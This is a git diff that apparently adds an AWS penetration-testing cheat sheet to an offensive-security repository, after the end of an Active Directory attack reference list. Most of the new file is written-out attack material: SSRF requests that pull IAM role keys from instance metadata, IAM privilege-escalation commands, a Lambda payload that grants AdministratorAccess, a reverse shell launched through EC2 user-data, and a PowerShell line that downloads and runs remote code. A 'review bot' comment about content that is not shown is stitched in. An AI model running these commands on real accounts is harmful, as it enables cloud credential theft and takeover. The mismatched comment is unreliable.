Kurosh Dabbagh - 26 January, 2022](https://www.blackarrow.net/adcs-weaponizing-esc7-attack/) +* [AD CS: from ManageCA to RCE - 11 February, 2022 - Pablo MartĂ­nez, Kurosh Dabbagh](https://www.blackarrow.net/ad-cs-from-manageca-to-rce/) +* [Introducing the Golden GMSA Attack - YUVAL GORDON - March 01, 2022](https://www.semperis.com/blog/golden-gmsa-attack/) +* [Introducing MalSCCM - Phil Keeble -May 4, 2022](https://labs.nettitude.com/blog/introducing-malsccm/) +* [Certifried: Active 
Directory Domain Privilege Escalation (CVE-2022–26923) - Oliver Lyak](https://research.ifcr.dk/certifried-active-directory-domain-privilege-escalation-cve-2022-26923-9e098fe298f4) +* [bloodyAD and CVE-2022-26923 - soka - 11 May 2022](https://cravaterouge.github.io/ad/privesc/2022/05/11/bloodyad-and-CVE-2022-26923.html) +* [DIVING INTO PRE-CREATED COMPUTER ACCOUNTS - May 10, 2022 - By Oddvar Moe](https://www.trustedsec.com/blog/diving-into-pre-created-computer-accounts/) +* [How NOT to use the PAM trust - Leveraging Shadow Principals for Cross Forest Attacks - Thursday, April 18, 2019 - Nikhil SamratAshok Mittal](http://www.labofapenetrationtester.com/2019/04/abusing-PAM.html) +* [Shadow Credentials - The Hacker Recipes](https://www.thehacker.recipes/ad/movement/kerberos/shadow-credentials) +* [Network Access Accounts are evil… - ROGER ZANDER - 13 SEP 2015](https://rzander.azurewebsites.net/network-access-accounts-are-evil/) +* [The Phantom Credentials of SCCM: Why the NAA Won’t Die - Duane Michael - Jun 28](https://posts.specterops.io/the-phantom-credentials-of-sccm-why-the-naa-wont-die-332ac7aa1ab9) +* [Diamond tickets - The Hacker Recipes](https://www.thehacker.recipes/ad/movement/kerberos/forged-tickets/diamond) +* [A Diamond (Ticket) in the Ruff - By CHARLIE CLARK July 05, 2022](https://www.semperis.com/blog/a-diamond-ticket-in-the-ruff/) +* [Sapphire tickets - The Hacker Recipes](https://www.thehacker.recipes/ad/movement/kerberos/forged-tickets/sapphire) +* [Exploiting RBCD Using a Normal User Account - tiraniddo.dev - Friday, 13 May 2022](https://www.tiraniddo.dev/2022/05/exploiting-rbcd-using-normal-user.html) +* [Exploring SCCM by Unobfuscating Network Access Accounts - @_xpn_ - Posted on 2022-07-09](https://blog.xpnsec.com/unobfuscating-network-access-accounts/) +* [.NET Advanced Code Auditing XmlSerializer Deserialization Vulnerability - April 2, 2019 by znlive](https://znlive.com/xmlserializer-deserialization-vulnerability) +* [Practical guide for Golden 
SAML - Practical guide step by step to create golden SAML](https://nodauf.dev/p/practical-guide-for-golden-saml/) +* [Relaying to AD Certificate Services over RPC - NOVEMBER 16, 2022 - SYLVAIN HEINIGER](https://blog.compass-security.com/2022/11/relaying-to-ad-certificate-services-over-rpc/) +* [I AM AD FS AND SO CAN YOU - Douglas Bienstock & Austin Baker - Mandiant](https://troopers.de/downloads/troopers19/TROOPERS19_AD_AD_FS.pdf) +* [Hunt for the gMSA secrets - Dr Nestori Syynimaa (@DrAzureAD) - August 29, 2022](https://aadinternals.com/post/gmsa/) +* [Relaying NTLM Authentication from SCCM Clients - Chris Thompson - Jun 30, 2022](https://posts.specterops.io/relaying-ntlm-authentication-from-sccm-clients-7dccb8f92867) +* [Poc’ing Beyond Domain Admin - Part 1 - cube0x0](https://cube0x0.github.io/Pocing-Beyond-DA/) +* [At the Edge of Tier Zero: The Curious Case of the RODC - Elad Shamir](https://posts.specterops.io/at-the-edge-of-tier-zero-the-curious-case-of-the-rodc-ef5f1799ca06) +* [Attacking Read-Only Domain Controllers (RODCs) to Own Active Directory - Sean Metcalf](https://adsecurity.org/?p=3592) +* [The Kerberos Key List Attack: The return of the Read Only Domain Controllers - Leandro Cuozzo](https://www.secureauth.com/blog/the-kerberos-key-list-attack-the-return-of-the-read-only-domain-controllers/) +* [Timeroasting: Attacking Trust Accounts in Active Directory - Tom Tervoort - 01 March 2023](https://www.secura.com/blog/timeroasting-attacking-trust-accounts-in-active-directory) +* [TIMEROASTING, TRUSTROASTING AND COMPUTER SPRAYING WHITE PAPER - Tom Tervoort](https://www.secura.com/uploads/whitepapers/Secura-WP-Timeroasting-v3.pdf) +* [Beyond LLMNR/NBNS Spoofing – Exploiting Active Directory-Integrated DNS - July 10, 2018 | Kevin Robertson](https://www.netspi.com/blog/technical/network-penetration-testing/exploiting-adidns/) +* [ADIDNS Revisited – WPAD, GQBL, and More - December 5, 2018 | Kevin 
Robertson](https://www.netspi.com/blog/technical/network-penetration-testing/adidns-revisited/) +* [Getting in the Zone: dumping Active Directory DNS using adidnsdump - Dirk-jan Mollema](https://blog.fox-it.com/2019/04/25/getting-in-the-zone-dumping-active-directory-dns-using-adidnsdump/) +* [S4U2self abuse - TheHackerRecipes](https://www.thehacker.recipes/ad/movement/kerberos/delegations/s4u2self-abuse) +* [Abusing Kerberos S4U2self for local privilege escalation - cfalta](https://cyberstoph.org/posts/2021/06/abusing-kerberos-s4u2self-for-local-privilege-escalation/) +* [External Trusts Are Evil - 14 March 2023 - Charlie Clark (@exploitph)](https://exploit.ph/external-trusts-are-evil.html) +* [Certificates and Pwnage and Patches, Oh My! - Will Schroeder - Nov 9, 2022](https://posts.specterops.io/certificates-and-pwnage-and-patches-oh-my-8ae0f4304c1d) diff --git a/docs/cloud/C.md b/docs/cloud/C.md deleted file mode 100644 index 40d9ab9..0000000 --- a/docs/cloud/C.md +++ /dev/null @@ -1 +0,0 @@ -TEST C \ No newline at end of file diff --git a/docs/cloud/aws/Cloud - AWS Pentest.md b/docs/cloud/aws/Cloud - AWS Pentest.md new file mode 100644 index 0000000..53a9499 --- /dev/null +++ b/docs/cloud/aws/Cloud - AWS Pentest.md 
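Review bot: the WSUS cleanup command in step 6 (`SharpWSUS.exe delete /updateid:... /groupname:”Demo Group`) uses a typographic opening quote and has no closing quote, so the group name will not be passed as a single argument; it should read `/groupname:"Demo Group"` as in steps 4 and 5. A few other things in this hunk are worth fixing before merge: the PXE example line `Get-PXECreds -InterfaceAlias ÂŤ lab 0 Âť` and the reference entries for `RĂŠmi Escourrou`, `Eloy PĂŠrez GonzĂĄlez` and `Pablo MartĂ­nez` carry mis-encoded UTF-8 (they should be `« lab 0 »`, `Rémi`, `Pérez González`, `Martínez`); the DSRM intro repeats itself ("repair or recover to repair or restore"); the sccmhunter invocation appears to end its `-dc-ip` value with a stray period (`10.10.10.10.`) before `-auto`; "NLTM hash" in the KeyTabExtract paragraph should be "NTLM hash"; "## Linux Active Directory" is immediately followed by "## CCACHE ticket reuse from /tmp" at the same heading level, so the CCACHE, keytab and sssd.conf sections should be demoted to `###` if they are meant to sit under it; and the reference list contains the Sean Metcalf RODC article and the Leandro Cuozzo Key List Attack article twice each. Also, most command blocks in the Linux section are bash sessions (`$ ls /tmp/ | grep krb5cc`, `git clone ...`) but are fenced as `powershell`; tagging them `bash` and keeping `ps1`/`powershell` for PowerShell only would fix the highlighting.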
@@ -0,0 +1,2410 @@ +# Cloud - AWS + +> Amazon Web Services offers reliable, scalable, and inexpensive cloud computing services. + +## Summary + +- [AWS](#aws) + - [Summary](#summary) + - [Training](#training) + - [Tools](#tools) + - [AWS - Patterns](#aws---patterns) + - [URL Services](#url-services) + - [Access Key ID & Secret](#access-key-id--secret) + - [AWS - Metadata SSRF](#aws---metadata-ssrf) + - [Method for Elastic Cloud Compute (EC2)](#method-for-elastic-cloud-compute-ec2) + - [Method for Container Service (Fargate)](#method-for-container-service-fargate) + - [AWS API calls that return credentials](#aws-api-calls-that-return-credentials) + - [AWS - Shadow Admin](#aws---shadow-admin) + - [Admin equivalent permission](#admin-equivalent-permission) + - [AWS - Gaining AWS Console Access via API Keys](#aws---gaining-aws-console-access-via-api-keys) + - [AWS - Enumerate IAM permissions](#aws---enumerate-iam-permissions) + - [AWS - Mount EBS volume to EC2 Linux](#aws---mount-ebs-volume-to-ec2-linux) + - [AWS - Copy EC2 using AMI Image](#aws---copy-ec2-using-ami-image) + - [AWS - Instance Connect - Push an SSH key to EC2 instance](#aws---instance-connect---push-an-ssh-key-to-ec2-instance) + - [AWS - Lambda - Extract function's code](#aws---lambda---extract-functions-code) + - [AWS - SSM - Command execution](#aws---ssm---command-execution) + - [AWS - Golden SAML Attack](#aws---golden-saml-attack) + - [AWS - Shadow Copy attack](#aws---shadow-copy-attack) + - [Disable CloudTrail](#disable-cloudtrail) + - [Cover tracks by obfuscating Cloudtrail logs and Guard Duty](#cover-tracks-by-obfuscating-cloudtrail-logs-and-guard-duty) + - [DynamoDB](#dynamodb) + - [Security checks](#security-checks) + - [AWSome Pentesting Cheatsheet](#awsome-pentesting-cheatsheet) + - [References](#references) + +## Training + +* CloudFoxable: A Gamified Cloud Hacking Sandbox - https://cloudfoxable.bishopfox.com/ +* AWSGoat : A Damn Vulnerable AWS Infrastructure - 
https://github.com/ine-labs/AWSGoat +* Damn Vulnerable Cloud Application - https://medium.com/poka-techblog/privilege-escalation-in-the-cloud-from-ssrf-to-global-account-administrator-fd943cf5a2f6 +* SadCloud - https://github.com/nccgroup/sadcloud +* Flaws - http://flaws.cloud +* Cloudgoat - https://github.com/RhinoSecurityLabs/cloudgoat + +## Tools + +* [CloudFox](https://github.com/BishopFox/CloudFox/) - Automating situational awareness for cloud penetration tests. Designed for white box enumeration (SecurityAudit/ReadOnly type permission), but can be used for black box (found credentials) as well. + * Either Download the [latest binary release](https://github.com/BishopFox/cloudfox/releases) for your platform, or build it from source. + ``` + git clone https://github.com/BishopFox/cloudfox.git + cd ./cloudfox + go build . + ``` + + * Run all AWS checks: `cloudfox aws --profile [profile-name] all-checks` + * List all AWS checks: `cloudfox aws` + +* [SkyArk](https://github.com/cyberark/SkyArk) - Discover the most privileged users in the scanned AWS environment, including the AWS Shadow Admins + * Requires read-Only permissions over IAM service + ```powershell + $ git clone https://github.com/cyberark/SkyArk + $ powershell -ExecutionPolicy Bypass -NoProfile + PS C> Import-Module .\SkyArk.ps1 -force + PS C> Start-AWStealth + + or in the Cloud Console + + PS C> IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/cyberark/SkyArk/master/AWStealth/AWStealth.ps1') + PS C> Scan-AWShadowAdmins + ``` + +* [Pacu](https://github.com/RhinoSecurityLabs/pacu) - Exploit configuration flaws within an AWS environment using an extensible collection of modules with a diverse feature-set + * Requires AWS Keys + ```powershell + $ git clone https://github.com/RhinoSecurityLabs/pacu + $ bash install.sh + $ python3 pacu.py + set_keys/swap_keys + ls + run [--keyword-arguments] + run --regions eu-west-1,us-west-1 + + # 
https://github.com/RhinoSecurityLabs/pacu/wiki/Module-Details + ``` + +* [Bucket Finder](https://digi.ninja/projects/bucket_finder.php) - Search for public buckets, list and download all files if directory indexing is enabled + ```powershell + wget https://digi.ninja/files/bucket_finder_1.1.tar.bz2 -O bucket_finder_1.1.tar.bz2 + ./bucket_finder.rb my_words + ./bucket_finder.rb --region ie my_words + US Standard = http://s3.amazonaws.com + Ireland = http://s3-eu-west-1.amazonaws.com + Northern California = http://s3-us-west-1.amazonaws.com + Singapore = http://s3-ap-southeast-1.amazonaws.com + Tokyo = http://s3-ap-northeast-1.amazonaws.com + + ./bucket_finder.rb --download --region ie my_words + ./bucket_finder.rb --log-file bucket.out my_words + ``` + +* [Boto3](https://boto3.amazonaws.com/v1/documentation/api/latest/index.html) - Amazon Web Services (AWS) SDK for Python + ```python + import boto3 + # Create an S3 client + s3 = boto3.client('s3',aws_access_key_id='AKIAJQDP3RKREDACTED',aws_secret_access_key='igH8yFmmpMbnkcUaCqXJIRIozKVaREDACTED',region_name='us-west-1') + + try: + result = s3.list_buckets() + print(result) + except Exception as e: + print(e) + ``` + +* [Prowler](https://github.com/toniblyx/prowler) - AWS security best practices assessments, audits, incident response, continuous monitoring, hardening and forensics readiness + + > It follows guidelines of the CIS Amazon Web Services Foundations Benchmark and DOZENS of additional checks including GDPR and HIPAA (+100). 
+ * Require: arn:aws:iam::aws:policy/SecurityAudit + + ```powershell + $ pip install awscli ansi2html detect-secrets + $ git clone https://github.com/toniblyx/prowler + $ sudo apt install jq + $ ./prowler -E check42,check43 + $ ./prowler -p custom-profile -r us-east-1 -c check11 + $ ./prowler -A 123456789012 -R ProwlerRole # sts assume-role + ``` + +* [Principal Mapper](https://github.com/nccgroup/PMapper) - A tool for quickly evaluating IAM permissions in AWS + ```powershell + https://github.com/nccgroup/PMapper + pip install principalmapper + pmapper graph --create + pmapper visualize --filetype png + pmapper analysis --output-type text + + # Determine if PowerUser can escalate privileges + pmapper query "preset privesc user/PowerUser" + pmapper argquery --principal user/PowerUser --preset privesc + + # Find all principals that can escalate privileges + pmapper query "preset privesc *" + pmapper argquery --principal '*' --preset privesc + + # Find all principals that PowerUser can access + pmapper query "preset connected user/PowerUser *" + pmapper argquery --principal user/PowerUser --resource '*' --preset connected + + # Find all principals that can access PowerUser + pmapper query "preset connected * user/PowerUser" + pmapper argquery --principal '*' --resource user/PowerUser --preset connected + ``` + +* [ScoutSuite](https://github.com/nccgroup/ScoutSuite/wiki) - Multi-Cloud Security Auditing Tool + ```powershell + $ git clone https://github.com/nccgroup/ScoutSuite + $ python scout.py PROVIDER --help + # The --session-token is optional and only used for temporary credentials (i.e. role assumption). 
+ $ python scout.py aws --access-keys --access-key-id --secret-access-key --session-token + $ python scout.py azure --cli + ``` + +* [s3_objects_check](https://github.com/nccgroup/s3_objects_check) - Whitebox evaluation of effective S3 object permissions, to identify publicly accessible files + ```powershell + $ git clone https://github.com/nccgroup/s3_objects_check + $ python3 -m venv env && source env/bin/activate + $ pip install -r requirements.txt + $ python s3-objects-check.py -h + $ python s3-objects-check.py -p whitebox-profile -e blackbox-profile + ``` + +* [cloudsplaining](https://github.com/salesforce/cloudsplaining) - An AWS IAM Security Assessment tool that identifies violations of least privilege and generates a risk-prioritized report + ```powershell + $ pip3 install --user cloudsplaining + $ cloudsplaining download --profile myawsprofile + $ cloudsplaining scan --input-file default.json + ``` + +* [weirdAAL](https://github.com/carnal0wnage/weirdAAL/wiki) - AWS Attack Library + ```powershell + python3 weirdAAL.py -m ec2_describe_instances -t demo + python3 weirdAAL.py -m lambda_get_account_settings -t demo + python3 weirdAAL.py -m lambda_get_function -a 'MY_LAMBDA_FUNCTION','us-west-2' -t yolo + ``` + +* [cloudmapper](https://github.com/duo-labs/cloudmapper.git) - CloudMapper helps you analyze your Amazon Web Services (AWS) environments + ```powershell + git clone https://github.com/duo-labs/cloudmapper.git + # sudo yum install autoconf automake libtool python3-devel.x86_64 python3-tkinter python-pip jq awscli + # You may additionally need "build-essential" + sudo apt-get install autoconf automake libtool python3.7-dev python3-tk jq awscli + pipenv install --skip-lock + pipenv shell + report: Generate HTML report. Includes summary of the accounts and audit findings. + iam_report: Generate HTML report for the IAM information of an account. + audit: Check for potential misconfigurations. + collect: Collect metadata about an account. 
+ find_admins: Look at IAM policies to identify admin users and roles, or principals with specific privileges + ``` + +* [Cognito Scanner](https://github.com/padok-team/cognito-scanner) - A CLI tool for executing attacks on cognito such as *Unwanted account creation*, *Account Oracle* and *Identity Pool escalation*. + ```bash + # Installation + $ pip install cognito-scanner + # Usage + $ cognito-scanner --help + # Get information about how to use the unwanted account creation script + $ cogntio-scanner account-creation --help + # For more details go to https://github.com/padok-team/cognito-scanner + ``` + +* [dufflebag](https://labs.bishopfox.com/dufflebag) - Find secrets that are accidentally exposed via Amazon EBS's "public" mode +* [NetSPI/AWS Consoler](https://github.com/NetSPI/aws_consoler) - Convert AWS Credentials into a console access + + + +## AWS - Patterns + +### URL Services + +| Service | URL | +|--------------|-----------------------| +| s3 | https://{user_provided}.s3.amazonaws.com | +| cloudfront | https://{random_id}.cloudfront.net | +| ec2 | ec2-{ip-seperated}.compute-1.amazonaws.com | +| es | https://{user_provided}-{random_id}.{region}.es.amazonaws.com | +| elb | http://{user_provided}-{random_id}.{region}.elb.amazonaws.com:80/443 | +| elbv2 | https://{user_provided}-{random_id}.{region}.elb.amazonaws.com | +| rds | mysql://{user_provided}.{random_id}.{region}.rds.amazonaws.com:3306 | +| rds | postgres://{user_provided}.{random_id}.{region}.rds.amazonaws.com:5432 | +| route 53 | {user_provided} | +| execute-api | https://{random_id}.execute-api.{region}.amazonaws.com/{user_provided} | +| cloudsearch | https://doc-{user_provided}-{random_id}.{region}.cloudsearch.amazonaws.com | +| transfer | sftp://s-{random_id}.server.transfer.{region}.amazonaws.com | +| iot | mqtt://{random_id}.iot.{region}.amazonaws.com:8883 | +| iot | https://{random_id}.iot.{region}.amazonaws.com:8443 | +| iot | https://{random_id}.iot.{region}.amazonaws.com:443 | +| mq | 
https://b-{random_id}-{1,2}.mq.{region}.amazonaws.com:8162 | +| mq | ssl://b-{random_id}-{1,2}.mq.{region}.amazonaws.com:61617 | +| kafka | b-{1,2,3,4}.{user_provided}.{random_id}.c{1,2}.kafka.{region}.amazonaws.com | +| kafka | {user_provided}.{random_id}.c{1,2}.kafka.useast-1.amazonaws.com | +| cloud9 | https://{random_id}.vfs.cloud9.{region}.amazonaws.com | +| mediastore | https://{random_id}.data.mediastore.{region}.amazonaws.com | +| kinesisvideo | https://{random_id}.kinesisvideo.{region}.amazonaws.com | +| mediaconvert | https://{random_id}.mediaconvert.{region}.amazonaws.com | +| mediapackage | https://{random_id}.mediapackage.{region}.amazonaws.com/in/v1/{random_id}/channel | + + +### Access Key ID & Secret + +IAM uses the following prefixes to indicate what type of resource each unique ID applies to. The first four characters are the prefix that depends on the type of the key. + +| Prefix | Resource type | +|--------------|-------------------------| +| ABIA | AWS STS service bearer token | +| ACCA | Context-specific credential | +| AGPA | User group | +| AIDA | IAM user | +| AIPA | Amazon EC2 instance profile | +| AKIA | Access key | +| ANPA | Managed policy | +| ANVA | Version in a managed policy | +| APKA | Public key | +| AROA | Role | +| ASCA | Certificate | +| ASIA | Temporary (AWS STS) access key | + +The rest of the string is Base32 encoded and can be used to recover the account id. 
+ +```py +import base64 +import binascii + +def AWSAccount_from_AWSKeyID(AWSKeyID): + + trimmed_AWSKeyID = AWSKeyID[4:] #remove KeyID prefix + x = base64.b32decode(trimmed_AWSKeyID) #base32 decode + y = x[0:6] + + z = int.from_bytes(y, byteorder='big', signed=False) + mask = int.from_bytes(binascii.unhexlify(b'7fffffffff80'), byteorder='big', signed=False) + + e = (z & mask)>>7 + return (e) + + +print ("account id:" + "{:012d}".format(AWSAccount_from_AWSKeyID("ASIAQNZGKIQY56JQ7WML"))) +``` + + +## AWS - Metadata SSRF + +> AWS released additional security defences against the attack. + +:warning: Only working with IMDSv1. +Enabling IMDSv2 : `aws ec2 modify-instance-metadata-options --instance-id --profile --http-endpoint enabled --http-token required`. + +In order to use IMDSv2 you must provide a token. + +```powershell +export TOKEN=`curl -X PUT -H "X-aws-ec2-metadata-token-ttl-seconds: 21600" "http://169.254.169.254/latest/api/token"` +curl -H "X-aws-ec2-metadata-token:$TOKEN" -v "http://169.254.169.254/latest/meta-data" +``` + +### Method for Elastic Cloud Compute (EC2) + +Example : https://awesomeapp.com/forward?target=http://169.254.169.254/latest/meta-data/iam/security-credentials/Awesome-WAF-Role/ + +1. Access the IAM : https://awesomeapp.com/forward?target=http://169.254.169.254/latest/meta-data/ + ```powershell + ami-id + ami-launch-index + ami-manifest-path + block-device-mapping/ + events/ + hostname + iam/ + identity-credentials/ + instance-action + instance-id + ``` +2. Find the name of the role assigned to the instance : https://awesomeapp.com/forward?target=http://169.254.169.254/latest/meta-data/iam/security-credentials/ +3. 
Extract the role's temporary keys : https://awesomeapp.com/forward?target=http://169.254.169.254/latest/meta-data/iam/security-credentials/Awesome-WAF-Role/ + ```powershell + { + "Code" : "Success", + "LastUpdated" : "2019-07-31T23:08:10Z", + "Type" : "AWS-HMAC", + "AccessKeyId" : "ASIA54BL6PJR37YOEP67", + "SecretAccessKey" : "OiAjgcjm1oi2xxxxxxxxOEXkhOMhCOtJMP2", + "Token" : "AgoJb3JpZ2luX2VjEDU86Rcfd/34E4rtgk8iKuTqwrRfOppiMnv", + "Expiration" : "2019-08-01T05:20:30Z" + } + ``` + +### Method for Container Service (Fargate) + +1. Fetch the AWS_CONTAINER_CREDENTIALS_RELATIVE_URI variable from https://awesomeapp.com/download?file=/proc/self/environ + ```powershell + JAVA_ALPINE_VERSION=8.212.04-r0 + HOSTNAME=bbb3c57a0ed3SHLVL=1PORT=8443HOME=/root + AWS_CONTAINER_CREDENTIALS_RELATIVE_URI=/v2/credentials/d22070e0-5f22-4987-ae90-1cd9bec3f447 + AWS_EXECUTION_ENV=AWS_ECS_FARGATEMVN_VER=3.3.9JAVA_VERSION=8u212AWS_DEFAULT_REGION=us-west-2 + ECS_CONTAINER_METADATA_URI=http://169.254.170.2/v3/cb4f6285-48f2-4a51-a787-67dbe61c13ffPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/lib/jvm/java-1.8-openjdk/jre/bin:/usr/lib/jvm/java-1.8-openjdk/bin:/usr/lib/mvn:/usr/lib/mvn/binLANG=C.UTF-8AWS_REGION=us-west-2Tag=48111bbJAVA_HOME=/usr/lib/jvm/java-1.8-openjdk/jreM2=/usr/lib/mvn/binPWD=/appM2_HOME=/usr/lib/mvnLD_LIBRARY_PATH=/usr/lib/jvm/java-1.8-openjdk/jre/lib/amd64/server:/usr/lib/jvm/java-1.8-openjdk/jre/lib/amd64:/usr/lib/jvm/java-1.8-openjd + ``` +2. 
Use the credential URL to dump the AccessKey and SecretKey : https://awesomeapp.com/forward?target=http://169.254.170.2/v2/credentials/d22070e0-5f22-4987-ae90-1cd9bec3f447 + ```powershell + { + "RoleArn": "arn:aws:iam::953574914659:role/awesome-waf-role", + "AccessKeyId": "ASIA54BL6PJR2L75XHVS", + "SecretAccessKey": "j72eTy+WHgIbO6zpe2DnfjEhbObuTBKcemfrIygt", + "Token": "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", + "Expiration": "2019-09-18T04:05:59Z" + } + ``` + + +### AWS API calls that return credentials + +- chime:createapikey +- [codepipeline:pollforjobs](https://docs.aws.amazon.com/codepipeline/latest/APIReference/API_PollForJobs.html) +- [cognito-identity:getopenidtoken](https://docs.aws.amazon.com/cognitoidentity/latest/APIReference/API_GetOpenIdToken.html) +- [cognito-identity:getopenidtokenfordeveloperidentity](https://docs.aws.amazon.com/cognitoidentity/latest/APIReference/API_GetOpenIdTokenForDeveloperIdentity.html) +- [cognito-identity:getcredentialsforidentity](https://docs.aws.amazon.com/cognitoidentity/latest/APIReference/API_GetCredentialsForIdentity.html) +- [connect:getfederationtoken](https://docs.aws.amazon.com/connect/latest/APIReference/API_GetFederationToken.html) +- [connect:getfederationtokens](https://docs.aws.amazon.com/connect/latest/APIReference/API_GetFederationToken.html) +- [ecr:getauthorizationtoken](https://docs.aws.amazon.com/AmazonECR/latest/APIReference/API_GetAuthorizationToken.html) +- [gamelift:requestuploadcredentials](https://docs.aws.amazon.com/gamelift/latest/apireference/API_RequestUploadCredentials.html) +- [iam:createaccesskey](https://docs.aws.amazon.com/IAM/latest/APIReference/API_CreateAccessKey.html) +- [iam:createloginprofile](https://docs.aws.amazon.com/IAM/latest/APIReference/API_CreateLoginProfile.html) +- [iam:createservicespecificcredential](https://docs.aws.amazon.com/IAM/latest/APIReference/API_CreateServiceSpecificCredential.html) +- 
[iam:resetservicespecificcredential](https://docs.aws.amazon.com/IAM/latest/APIReference/API_ResetServiceSpecificCredential.html) +- [iam:updateaccesskey](https://docs.aws.amazon.com/IAM/latest/APIReference/API_UpdateAccessKey.html) +- [lightsail:getinstanceaccessdetails](https://docs.aws.amazon.com/lightsail/2016-11-28/api-reference/API_GetInstanceAccessDetails.html) +- [lightsail:getrelationaldatabasemasteruserpassword](https://docs.aws.amazon.com/lightsail/2016-11-28/api-reference/API_GetRelationalDatabaseMasterUserPassword.html) +- [rds-db:connect](https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/UsingWithRDS.IAMDBAuth.IAMPolicy.html) +- [redshift:getclustercredentials](https://docs.aws.amazon.com/redshift/latest/APIReference/API_GetClusterCredentials.html) +- [sso:getrolecredentials](https://docs.aws.amazon.com/singlesignon/latest/PortalAPIReference/API_GetRoleCredentials.html) +- [mediapackage:rotatechannelcredentials](https://docs.aws.amazon.com/mediapackage/latest/apireference/channels-id-credentials.html) +- [mediapackage:rotateingestendpointcredentials](https://docs.aws.amazon.com/mediapackage/latest/apireference/channels-id-ingest_endpoints-ingest_endpoint_id-credentials.html) +- [sts:assumerole](https://docs.aws.amazon.com/cli/latest/reference/sts/assume-role.html) +- [sts:assumerolewithsaml](https://docs.aws.amazon.com/cli/latest/reference/sts/assume-role-with-saml.html) +- [sts:assumerolewithwebidentity](https://docs.aws.amazon.com/cli/latest/reference/sts/assume-role-with-web-identity.html) +- [sts:getfederationtoken](https://docs.aws.amazon.com/cli/latest/reference/sts/get-federation-token.html) +- [sts:getsessiontoken](https://docs.aws.amazon.com/cli/latest/reference/sts/get-session-token.html) + + +## AWS - Shadow Admin + +### Admin equivalent permission + +- AdministratorAccess + + ```powershell + "Action": "*" + "Resource": "*" + ``` + +- **ec2:AssociateIamInstanceProfile** : attach an IAM instance profile to an EC2 instance + 
```powershell + aws ec2 associate-iam-instance-profile --iam-instance-profile Name=admin-role --instance-id i-0123456789 + ``` + +- **iam:CreateAccessKey** : create a new access key to another IAM admin account + ```powershell + aws iam create-access-key –user-name target_user + ``` + +- **iam:CreateLoginProfile** : add a new password-based login profile, set a new password for an entity and impersonate it + ```powershell + $ aws iam create-login-profile –user-name target_user –password '|[3rxYGGl3@`~68)O{,-$1B”zKejZZ.X1;6T}f;/CQQeXSo>}th)KZ7v?\\hq.#@dh49″=fT;|,lyTKOLG7J[qH$LV5U<9`O~Z”,jJ[iT-D^(' –no-password-reset-required + ``` + +- **iam:UpdateLoginProfile** : reset other IAM users’ login passwords. + ```powershell + $ aws iam update-login-profile –user-name target_user –password '|[3rxYGGl3@`~68)O{,-$1B”zKejZZ.X1;6T}f;/CQQeXSo>}th)KZ7v?\\hq.#@dh49″=fT;|,lyTKOLG7J[qH$LV5U<9`O~Z”,jJ[iT-D^(' –no-password-reset-required + ``` + +- **iam:AttachUserPolicy**, **iam:AttachGroupPolicy** or **iam:AttachRolePolicy** : attach existing admin policy to any other entity he currently possesses + ```powershell + $ aws iam attach-user-policy –user-name my_username –policy-arn arn:aws:iam::aws:policy/AdministratorAccess + $ aws iam attach-user-policy –user-name my_username –policy-arn arn:aws:iam::aws:policy/AdministratorAccess + $ aws iam attach-role-policy –role-name role_i_can_assume –policy-arn arn:aws:iam::aws:policy/AdministratorAccess + ``` + +- **iam:PutUserPolicy**, **iam:PutGroupPolicy** or **iam:PutRolePolicy** : added inline policy will allow the attacker to grant additional privileges to previously compromised entities. + ```powershell + $ aws iam put-user-policy –user-name my_username –policy-name my_inline_policy –policy-document file://path/to/administrator/policy.json + ``` + +- **iam:CreatePolicy** : add a stealthy admin policy +- **iam:AddUserToGroup** : add into the admin group of the organization. 
+ ```powershell + $ aws iam add-user-to-group –group-name target_group –user-name my_username + ``` + +- **iam:UpdateAssumeRolePolicy** + **sts:AssumeRole** : change the assuming permissions of a privileged role and then assume it with a non-privileged account. + ```powershell + $ aws iam update-assume-role-policy –role-name role_i_can_assume –policy-document file://path/to/assume/role/policy.json + ``` + +- **iam:CreatePolicyVersion** & **iam:SetDefaultPolicyVersion** : change customer-managed policies and change a non-privileged entity to be a privileged one. + ```powershell + $ aws iam create-policy-version –policy-arn target_policy_arn –policy-document file://path/to/administrator/policy.json –set-as-default + $ aws iam set-default-policy-version –policy-arn target_policy_arn –version-id v2 + ``` + +- **lambda:UpdateFunctionCode** : give an attacker access to the privileges associated with the Lambda service role that is attached to that function. + ```powershell + $ aws lambda update-function-code –function-name target_function –zip-file fileb://my/lambda/code/zipped.zip + ``` + +- **glue:UpdateDevEndpoint** : give an attacker access to the privileges associated with the role attached to the specific Glue development endpoint. + ```powershell + $ aws glue –endpoint-name target_endpoint –public-key file://path/to/my/public/ssh/key.pub + ``` + + +- **iam:PassRole** + **ec2:CreateInstanceProfile**/**ec2:AddRoleToInstanceProfile** : an attacker could create a new privileged instance profile and attach it to a compromised EC2 instance that he possesses. + +- **iam:PassRole** + **ec2:RunInstance** : give an attacker access to the set of permissions that the instance profile/role has, which again could range from no privilege escalation to full administrator access of the AWS account. 
+ ```powershell + # add ssh key + $ aws ec2 run-instances –image-id ami-a4dc46db –instance-type t2.micro –iam-instance-profile Name=iam-full-access-ip –key-name my_ssh_key –security-group-ids sg-123456 + # execute a reverse shell + $ aws ec2 run-instances –image-id ami-a4dc46db –instance-type t2.micro –iam-instance-profile Name=iam-full-access-ip –user-data file://script/with/reverse/shell.sh + ``` + +- **iam:PassRole** + **lambda:CreateFunction** + **lambda:InvokeFunction** : give a user access to the privileges associated with any Lambda service role that exists in the account. + ```powershell + $ aws lambda create-function –function-name my_function –runtime python3.6 –role arn_of_lambda_role –handler lambda_function.lambda_handler –code file://my/python/code.py + $ aws lambda invoke –function-name my_function output.txt + ``` + Example of code.py + ```python + import boto3 + def lambda_handler(event, context): + client = boto3.client('iam') + response = client.attach_user_policy( + UserName='my_username', + PolicyArn="arn:aws:iam::aws:policy/AdministratorAccess" + ) + return response + ``` + +* **iam:PassRole** + **glue:CreateDevEndpoint** : access to the privileges associated with any Glue service role that exists in the account. + ```powershell + $ aws glue create-dev-endpoint –endpoint-name my_dev_endpoint –role-arn arn_of_glue_service_role –public-key file://path/to/my/public/ssh/key.pub + ``` + +## AWS - Gaining AWS Console Access via API Keys + +A utility to convert your AWS CLI credentials into AWS console access. + +```powershell +$> git clone https://github.com/NetSPI/aws_consoler +$> aws_consoler -v -a AKIA[REDACTED] -s [REDACTED] +2020-03-13 19:44:57,800 [aws_consoler.cli] INFO: Validating arguments... +2020-03-13 